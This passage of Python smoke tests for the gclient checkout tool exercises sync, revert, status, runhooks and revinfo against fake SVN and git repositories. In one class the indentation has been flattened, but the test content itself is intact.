    self.check(('./: None\n', '', 0), results)
    self.check(('', '', 0), self.gclient(['cleanup']))
    self.check(('', '', 0), self.gclient(['diff']))
    self.assertTree({})
    self.check(('', '', 0), self.gclient(['pack']))
    self.check(('', '', 0), self.gclient(['revert']))
    self.assertTree({})
    self.check(('', '', 0), self.gclient(['runhooks']))
    self.assertTree({})
    self.check(('', '', 0), self.gclient(['status']))

  def testDifferentTopLevelDirectory(self):
    # Check that even if the .gclient file does not mention the directory src
    # itself, but it is included via dependencies, the .gclient file is used.
    self.gclient(['config', self.svn_base + 'trunk/src.DEPS'])
    deps = join(self.root_dir, 'src.DEPS')
    os.mkdir(deps)
    write(join(deps, 'DEPS'),
        'deps = { "src": "%strunk/src" }' % (self.svn_base))
    src = join(self.root_dir, 'src')
    os.mkdir(src)
    res = self.gclient(['status', '--jobs', '1'], src)
    self.checkBlock(res[0], [('running', deps), ('running', src)])
class GClientSmokeSVN(GClientSmokeBase):
def setUp(self):
super(GClientSmokeSVN, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_svn()
def testSync(self):
# TODO(maruel): safesync.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Test unversioned checkout.
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running',
# This is due to the way svn update is called for a
# single file when File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running', 'running', 'running', 'running'])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
# Manually remove svn_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'svn_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--revision', 'src@1', '--deps', 'mac',
'--delete_unversioned_trees', '--jobs', '1'],
['running', 'running', 'running', 'running', 'deleting'])
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running', 'running', 'running', 'running'])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncIgnoredSolutionName(self):
"""TODO(maruel): This will become an error soon."""
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
results = self.gclient(
['sync', '--deps', 'mac', '-r', 'invalid@1', '--jobs', '1'])
self.checkBlock(results[0], [
'running', 'running',
# This is due to the way svn update is called for a single file when
# File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running', 'running', 'running', 'running'])
self.checkString('Please fix your script, having invalid --revision flags '
'will soon considered an error.\n', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncNoSolutionName(self):
# When no solution name is provided, gclient uses the first solution listed.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.parseGclient(['sync', '--deps', 'mac', '-r', '1', '--jobs', '1'],
['running', 'running', 'running', 'running'])
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
self.assertTree(tree)
def testSyncJobs(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Test unversioned checkout.
# Use --jobs 1 otherwise the order is not deterministic.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
[
'running',
'running',
# This is due to the way svn update is called for a
# single file when File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running',
'running',
'running',
'running',
],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
# Manually remove svn_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'svn_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--revision', 'src@1', '--deps', 'mac',
'--delete_unversioned_trees', '--jobs', '8'],
['running', 'running', 'running', 'running', 'deleting'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running', 'running', 'running', 'running'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncCustomDeps(self):
if not self.enabled:
return
out = (
'solutions = [\n'
' { "name" : "src",\n'
' "url" : "%(base)s/src",\n'
' "custom_deps" : {\n'
# Remove 2 deps, change 1, add 1.
' "src/other": None,\n'
' "src/third_party/foo": \'%(base)s/third_party/prout\',\n'
' "src/file/other": None,\n'
' "new_deps": "/trunk/src/third_party",\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
fileobj = open(os.path.join(self.root_dir, '.gclient'), 'w')
fileobj.write(out)
fileobj.close()
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running', 'running', 'running'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/prout@2', 'src/third_party/foo'),
('trunk/src/third_party@2', 'new_deps'))
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncCustomDepsNoDeps(self):
if not self.enabled:
return
out = (
'solutions = [\n'
# This directory has no DEPS file.
' { "name" : "src/third_party",\n'
' "url" : "%(base)s/src/third_party",\n'
' "custom_deps" : {\n'
# Add 1.
' "src/other": \'/trunk/other\',\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
fileobj = open(os.path.join(self.root_dir, '.gclient'), 'w')
fileobj.write(out)
fileobj.close()
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src/third_party@2', 'src/third_party'),
('trunk/other@2', 'src/other'))
self.assertTree(tree)
def testRevertAndStatus(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac'])
write(join(self.root_dir, 'src', 'other', 'hi'), 'Hey!')
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')],
['running', join(self.root_dir, 'src', 'other')]])
out = self.svnBlockCleanup(out)
self.checkString('file', out[0][1])
self.checkString('other', out[0][2])
self.checkString('svn_hooked1', out[0][3])
self.checkString(join('third_party', 'foo'), out[0][4])
self.checkString('hi', out[1][1])
self.assertEquals(5, len(out[0]))
self.assertEquals(2, len(out[1]))
# Revert implies --force implies running hooks without looking at pattern
# matching.
results = self.gclient(['revert', '--deps', 'mac', '--jobs', '1'])
out = self.splitBlock(results[0])
# src, src/other is missing, src/other, src/third_party/foo is missing,
# src/third_party/foo, 2 svn hooks, 3 related to File().
self.assertEquals( 8, len(out))
self.checkString('', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
tree['src/svn_hooked2'] = 'svn_hooked2'
self.assertTree(tree)
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')]])
out = self.svnBlockCleanup(out)
self.checkString('file', out[0][1])
self.checkString('other', out[0][2])
self.checkString('svn_hooked1', out[0][3])
self.checkString('svn_hooked2', out[0][4])
self.checkString(join('third_party', 'foo'), out[0][5])
self.assertEquals(6, len(out[0]))
self.assertEquals(1, len(out))
def testRevertAndStatusDepsOs(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac', '--revision', 'src@1'])
write(join(self.root_dir, 'src', 'other', 'hi'), 'Hey!')
# Without --verbose, gclient won't output the directories without
# modification.
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')],
['running', join(self.root_dir, 'src', 'other')]])
out = self.svnBlockCleanup(out)
self.checkString('other', out[0][1])
self.checkString(join('third_party', 'fpp'), out[0][2])
self.checkString(join('third_party', 'prout'), out[0][3])
self.checkString('hi', out[1][1])
self.assertEquals(4, len(out[0]))
self.assertEquals(2, len(out[1]))
# So verify it works with --verbose.
out = self.parseGclient(
['status', '--deps', 'mac', '--verbose', '--jobs', '1'],
[['running', join(self.root_dir, 'src')],
['running', join(self.root_dir, 'src', 'other')],
['running', join(self.root_dir, 'src', 'third_party', 'fpp')],
['running', join(self.root_dir, 'src', 'third_party', 'prout')]])
out = self.svnBlockCleanup(out)
self.checkString('other', out[0][5])
self.checkString(join('third_party', 'fpp'), out[0][7])
self.checkString(join('third_party', 'prout'), out[0][8])
self.checkString('hi', out[1][5])
self.assertEquals(9, len(out[0]))
self.assertEquals(7, len(out[1]))
self.assertEquals(6, len(out[2]))
self.assertEquals(6, len(out[3]))
self.assertEquals(4, len(out))
# Revert implies --force implies running hooks without looking at pattern
# matching.
# TODO(maruel): In general, gclient revert output is wrong. It should output
# the file list after some ___ running 'svn status'
results = self.gclient(['revert', '--deps', 'mac', '--jobs', '1'])
out = self.splitBlock(results[0])
self.assertEquals(4, len(out))
self.checkString('', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/prout@2', 'src/third_party/prout'))
self.assertTree(tree)
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')]])
out = self.svnBlockCleanup(out)
self.checkString('other', out[0][1])
self.checkString(join('third_party', 'fpp'), out[0][2])
self.checkString(join('third_party', 'prout'), out[0][3])
self.assertEquals(4, len(out[0]))
def testRunHooks(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync', '--deps', 'mac'])
out = self.parseGclient(['runhooks', '--deps', 'mac'],
['running', 'running'])
self.checkString(1, len(out[0]))
self.checkString(1, len(out[1]))
def testRunHooksDepsOs(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync', '--deps', 'mac', '--revision', 'src@1'])
out = self.parseGclient(['runhooks', '--deps', 'mac'], [])
self.assertEquals([], out)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
out = ('src: %(base)s/src\n'
'src/file/other: File("%(base)s/other/DEPS")\n'
'src/other: %(base)s/other\n'
'src/third_party/foo: %(base)s/third_party/foo@1\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
out = ('src: %(base)s/src@2\n'
'src/file/other: %(base)s/other/DEPS@2\n'
'src/other: %(base)s/other@2\n'
'src/third_party/foo: %(base)s/third_party/foo@1\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--snapshot'])
out = ('# Snapshot generated with gclient revinfo --snapshot\n'
'solutions = [\n'
' { "name" : "src",\n'
' "url" : "%(base)s/src",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' "foo/bar": None,\n'
' "invalid": None,\n'
' "src/file/other": \'%(base)s/other/DEPS@2\',\n'
' "src/other": \'%(base)s/other@2\',\n'
' "src/third_party/foo": '
'\'%(base)s/third_party/foo@1\',\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
def testRevInfoAltDeps(self):
  """`revinfo --snapshot` must preserve a non-default deps file name
  (DEPS.alt) in the emitted spec."""
  if not self.enabled:
    return
  self.gclient(['config', self.svn_base + 'trunk/src/', '--deps-file',
                'DEPS.alt'])
  self.gclient(['sync'])
  results = self.gclient(['revinfo', '--snapshot'])
  out = ('# Snapshot generated with gclient revinfo --snapshot\n'
         'solutions = [\n'
         ' { "name" : "src",\n'
         ' "url" : "%(base)s/src",\n'
         ' "deps_file" : "DEPS.alt",\n'
         ' "managed" : True,\n'
         ' "custom_deps" : {\n'
         ' "src/other2": \'%(base)s/other@2\',\n'
         ' },\n'
         ' "safesync_url": "",\n'
         ' },\n'
         ']\n\n' %
         { 'base': self.svn_base + 'trunk' })
  self.check((out, '', 0), results)
def testWrongDirectory(self):
  """Running from an unrelated sibling directory must not reuse .gclient.

  The configuration only describes the 'src' solution; issuing a command
  from 'src-other' must fail with the 'client not configured' error.
  """
  if not self.enabled:
    return
  self.gclient(['config', self.svn_base + 'trunk/src/'])
  self.gclient(['sync'])
  unrelated_dir = join(self.root_dir, 'src-other')
  os.mkdir(unrelated_dir)
  expected = ('', "Error: client not configured; see 'gclient config'\n", 1)
  self.check(expected, self.gclient(['status'], unrelated_dir))
def testCorrectDirectory(self):
  """A command issued inside the 'src' checkout must find and use the
  .gclient configuration from the parent directory."""
  if not self.enabled:
    return
  self.gclient(['config', self.svn_base + 'trunk/src/'])
  self.gclient(['sync'])
  checkout_dir = join(self.root_dir, 'src')
  result = self.gclient(['status', '--jobs', '1'], checkout_dir)
  self.checkBlock(result[0], [('running', checkout_dir)])
def testInitialCheckoutNotYetDone(self):
  """gclient must be runnable before the initial checkout has been done."""
  # Check that gclient can be executed when the initial checkout hasn't been
  # done yet.
  if not self.enabled:
    return
  self.gclient(['config', self.svn_base + 'trunk/src/'])
  self.parseGclient(
      ['sync', '--jobs', '1'],
      ['running', 'running',
       # This is due to the way svn update is called for a
       # single file when File() is used in a DEPS file.
       ('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
       'running', 'running', 'running', 'running'])
def testInitialCheckoutFailed(self):
  """gclient sync must recover when the bookkeeping of a previous checkout
  is missing (simulated by deleting .gclient_entries)."""
  # Check that gclient can be executed from an arbitrary sub directory if the
  # initial checkout has failed.
  if not self.enabled:
    return
  self.gclient(['config', self.svn_base + 'trunk/src/'])
  self.gclient(['sync'])
  # Cripple the checkout.
  os.remove(join(self.root_dir, '.gclient_entries'))
  src = join(self.root_dir, 'src')
  # Re-sync from inside the checkout; it must succeed and re-process deps.
  res = self.gclient(['sync', '--jobs', '1'], src)
  self.checkBlock(res[0],
                  ['running', 'running', 'running'])
def testUnversionedRepository(self):
  # Check that gclient automatically deletes crippled SVN repositories.
  if not self.enabled:
    return
  self.gclient(['config', self.svn_base + 'trunk/src/'])
  cmd = ['sync', '--jobs', '1', '--delete_unversioned_trees', '--reset']
  # First sync must succeed (exit code 0).
  self.assertEquals(0, self.gclient(cmd)[-1])
  third_party = join(self.root_dir, 'src', 'third_party')
  # Mark 'foo' as svn:ignore'd so the parent repo treats it as unversioned.
  subprocess2.check_call(['svn', 'propset', '-q', 'svn:ignore', 'foo', '.'],
                         cwd=third_party)
  # Cripple src/third_party/foo and make sure gclient still succeeds.
  gclient_utils.rmtree(join(third_party, 'foo', '.svn'))
  self.assertEquals(0, self.gclient(cmd)[-1])
class GClientSmokeSVNTransitive(GClientSmokeBase):
  """Smoke tests for `gclient sync --transitive` over a fake SVN repo.

  With --transitive, unpinned deps are checked out at the revision (or
  timestamp, for a different repository) of the parent solution.
  """

  FAKE_REPOS_CLASS = FakeRepoTransitive

  def setUp(self):
    super(GClientSmokeSVNTransitive, self).setUp()
    self.enabled = self.FAKE_REPOS.set_up_svn()

  def testSyncTransitive(self):
    if not self.enabled:
      return
    self.gclient(['config', self.svn_base + 'trunk/src/'])

    def test_case(parent, timestamp, fixed, output):
      # We check out revision 'parent' and expect the following:
      # - src/ is checked out at r'parent'
      # - src/same_repo is checked out at r'parent' (due to --transitive)
      # - src/same_repo_fixed is checked out at r'fixed'
      # - src/different_repo is checked out at r'timestamp'
      # (due to --transitive)
      # - src/different_repo_fixed is checked out at r'fixed'
      revisions = self.FAKE_REPOS.svn_revs
      self.parseGclient(
          ['sync', '--transitive', '--revision', 'src@%d' % parent,
           '--jobs', '1'], output)
      self.assertTree({
          'src/origin': revisions[parent]['trunk/src/origin'],
          'src/DEPS': revisions[parent]['trunk/src/DEPS'],
          'src/same_repo/origin': revisions[parent]['trunk/third_party/origin'],
          'src/same_repo_fixed/origin':
              revisions[fixed]['trunk/third_party/origin'],
          'src/different_repo/origin':
              revisions[timestamp]['trunk/third_party/origin'],
          'src/different_repo_fixed/origin':
              revisions[fixed]['trunk/third_party/origin'],
      })

    # Here are the test cases for checking out 'trunk/src' at r1, r2 and r3
    # r1: Everything is normal
    test_case(parent=1, timestamp=1, fixed=1,
              output=['running', 'running', 'running', 'running', 'running'])
    # r2: Svn will scan from r1 upwards until it finds a revision matching the
    # given timestamp or it takes the next smallest one (which is r2 in this
    # case).
    test_case(parent=2, timestamp=2, fixed=1,
              output=['running', 'running', 'running'])
    # r3: Svn will scan from r1 upwards until it finds a revision matching the
    # given timestamp or it takes the next smallest one. Since
    # timestamp(r3) < timestamp(r2) svn will checkout r1.
    # This happens often on http://googlecode.com but is unexpected to happen
    # with svnserve (unless you manually change 'svn:date')
    test_case(parent=3, timestamp=1, fixed=1,
              output=['running', 'running', 'running'])
class GClientSmokeGIT(GClientSmokeBase):
  """Smoke tests for gclient sync/runhooks/revinfo over fake git repos."""

  def setUp(self):
    super(GClientSmokeGIT, self).setUp()
    self.enabled = self.FAKE_REPOS.set_up_git()

  def testSync(self):
    """Unversioned sync, then versioned sync backward, then incremental."""
    if not self.enabled:
      return
    # TODO(maruel): safesync.
    self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
    # Test unversioned checkout.
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '1'],
        ['running', 'running'])
    # TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
    # add sync parsing to get the list of updated files.
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)
    # Manually remove git_hooked1 before synching to make sure it's not
    # recreated.
    os.remove(join(self.root_dir, 'src', 'git_hooked1'))
    # Test incremental versioned sync: sync backward.
    self.parseGclient(
        ['sync', '--jobs', '1', '--revision',
         'src@' + self.githash('repo_1', 1),
         '--deps', 'mac', '--delete_unversioned_trees'],
        ['deleting'])
    tree = self.mangle_git_tree(('repo_1@1', 'src'),
                                ('repo_2@2', 'src/repo2'),
                                ('repo_3@1', 'src/repo2/repo3'),
                                ('repo_4@2', 'src/repo4'))
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)
    # Test incremental sync: delete-unversioned_trees isn't there.
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '1'],
        ['running', 'running'])
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@1', 'src/repo2/repo3'),
                                ('repo_3@2', 'src/repo2/repo_renamed'),
                                ('repo_4@2', 'src/repo4'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)

  def testSyncIgnoredSolutionName(self):
    """TODO(maruel): This will become an error soon."""
    if not self.enabled:
      return
    self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
    # A --revision flag for an unknown solution must only warn, for now.
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '1',
         '--revision', 'invalid@' + self.githash('repo_1', 1)],
        ['running', 'running'],
        'Please fix your script, having invalid --revision flags '
        'will soon considered an error.\n')
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)

  def testSyncNoSolutionName(self):
    if not self.enabled:
      return
    # When no solution name is provided, gclient uses the first solution listed.
    self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '1',
         '--revision', self.githash('repo_1', 1)],
        [])
    tree = self.mangle_git_tree(('repo_1@1', 'src'),
                                ('repo_2@2', 'src/repo2'),
                                ('repo_3@1', 'src/repo2/repo3'),
                                ('repo_4@2', 'src/repo4'))
    self.assertTree(tree)

  def testSyncJobs(self):
    """Same scenario as testSync but with parallel jobs (untangled output)."""
    if not self.enabled:
      return
    # TODO(maruel): safesync.
    self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
    # Test unversioned checkout.
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '8'],
        ['running', 'running'],
        untangle=True)
    # TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
    # add sync parsing to get the list of updated files.
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)
    # Manually remove git_hooked1 before synching to make sure it's not
    # recreated.
    os.remove(join(self.root_dir, 'src', 'git_hooked1'))
    # Test incremental versioned sync: sync backward.
    # Use --jobs 1 otherwise the order is not deterministic.
    self.parseGclient(
        ['sync', '--revision', 'src@' + self.githash('repo_1', 1),
         '--deps', 'mac', '--delete_unversioned_trees', '--jobs', '1'],
        ['deleting'],
        untangle=True)
    tree = self.mangle_git_tree(('repo_1@1', 'src'),
                                ('repo_2@2', 'src/repo2'),
                                ('repo_3@1', 'src/repo2/repo3'),
                                ('repo_4@2', 'src/repo4'))
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)
    # Test incremental sync: delete-unversioned_trees isn't there.
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '8'],
        ['running', 'running'],
        untangle=True)
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@1', 'src/repo2/repo3'),
                                ('repo_3@2', 'src/repo2/repo_renamed'),
                                ('repo_4@2', 'src/repo4'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)

  def testRunHooks(self):
    if not self.enabled:
      return
    self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
    self.gclient(['sync', '--deps', 'mac'])
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)
    # Remove the hook products to verify runhooks recreates them.
    os.remove(join(self.root_dir, 'src', 'git_hooked1'))
    os.remove(join(self.root_dir, 'src', 'git_hooked2'))
    # runhooks runs all hooks even if not matching by design.
    out = self.parseGclient(['runhooks', '--deps', 'mac'],
                            ['running', 'running'])
    self.assertEquals(1, len(out[0]))
    self.assertEquals(1, len(out[1]))
    tree = self.mangle_git_tree(('repo_1@2', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)

  def testPreDepsHooks(self):
    """Pre-DEPS hooks run on sync (even with --nohooks) but not on runhooks
    and not with --noprehooks."""
    if not self.enabled:
      return
    self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
    expectation = [
        ('running', self.root_dir),  # pre-deps hook
    ]
    out = self.parseGclient(['sync', '--deps', 'mac', '--jobs=1',
                             '--revision', 'src@' + self.githash('repo_5', 2)],
                            expectation)
    self.assertEquals(2, len(out[0]))
    self.assertEquals('pre-deps hook', out[0][1])
    tree = self.mangle_git_tree(('repo_5@2', 'src'),
                                ('repo_1@2', 'src/repo1'),
                                ('repo_2@1', 'src/repo2')
                                )
    tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
    self.assertTree(tree)

    os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))

    # Pre-DEPS hooks don't run with runhooks.
    self.gclient(['runhooks', '--deps', 'mac'])
    tree = self.mangle_git_tree(('repo_5@2', 'src'),
                                ('repo_1@2', 'src/repo1'),
                                ('repo_2@1', 'src/repo2')
                                )
    self.assertTree(tree)

    # Pre-DEPS hooks run when syncing with --nohooks.
    self.gclient(['sync', '--deps', 'mac', '--nohooks',
                  '--revision', 'src@' + self.githash('repo_5', 2)])
    tree = self.mangle_git_tree(('repo_5@2', 'src'),
                                ('repo_1@2', 'src/repo1'),
                                ('repo_2@1', 'src/repo2')
                                )
    tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
    self.assertTree(tree)

    os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))

    # Pre-DEPS hooks don't run with --noprehooks
    self.gclient(['sync', '--deps', 'mac', '--noprehooks',
                  '--revision', 'src@' + self.githash('repo_5', 2)])
    tree = self.mangle_git_tree(('repo_5@2', 'src'),
                                ('repo_1@2', 'src/repo1'),
                                ('repo_2@1', 'src/repo2')
                                )
    self.assertTree(tree)

  def testPreDepsHooksError(self):
    """A failing pre-DEPS hook must abort the sync with exit code 2."""
    if not self.enabled:
      return
    self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
    expectated_stdout = [
        ('running', self.root_dir),  # pre-deps hook
        ('running', self.root_dir),  # pre-deps hook (fails)
    ]
    expected_stderr = ('Error: Command /usr/bin/python -c import sys; '
                       'sys.exit(1) returned non-zero exit status 1 in %s\n'
                       % self.root_dir)
    stdout, stderr, retcode = self.gclient(['sync', '--deps', 'mac', '--jobs=1',
                                            '--revision',
                                            'src@' + self.githash('repo_5', 3)])
    self.assertEquals(stderr, expected_stderr)
    self.assertEquals(2, retcode)
    self.checkBlock(stdout, expectated_stdout)

  def testRevInfo(self):
    if not self.enabled:
      return
    self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
    self.gclient(['sync', '--deps', 'mac'])
    # Plain revinfo: URLs as declared in DEPS (short hash for pinned dep).
    results = self.gclient(['revinfo', '--deps', 'mac'])
    out = ('src: %(base)srepo_1\n'
           'src/repo2: %(base)srepo_2@%(hash2)s\n'
           'src/repo2/repo_renamed: %(base)srepo_3\n' %
           {
               'base': self.git_base,
               'hash2': self.githash('repo_2', 1)[:7],
           })
    self.check((out, '', 0), results)
    # --actual: full hashes of the revisions actually checked out.
    results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
    out = ('src: %(base)srepo_1@%(hash1)s\n'
           'src/repo2: %(base)srepo_2@%(hash2)s\n'
           'src/repo2/repo_renamed: %(base)srepo_3@%(hash3)s\n' %
           {
               'base': self.git_base,
               'hash1': self.githash('repo_1', 2),
               'hash2': self.githash('repo_2', 1),
               'hash3': self.githash('repo_3', 2),
           })
    self.check((out, '', 0), results)
class GClientSmokeGITMutates(GClientSmokeBase):
  """testRevertAndStatus mutates the git repo so move it to its own suite."""

  def setUp(self):
    super(GClientSmokeGITMutates, self).setUp()
    self.enabled = self.FAKE_REPOS.set_up_git()

  def testRevertAndStatus(self):
    if not self.enabled:
      return

    # Commit new change to repo to make repo_2's hash use a custom_var.
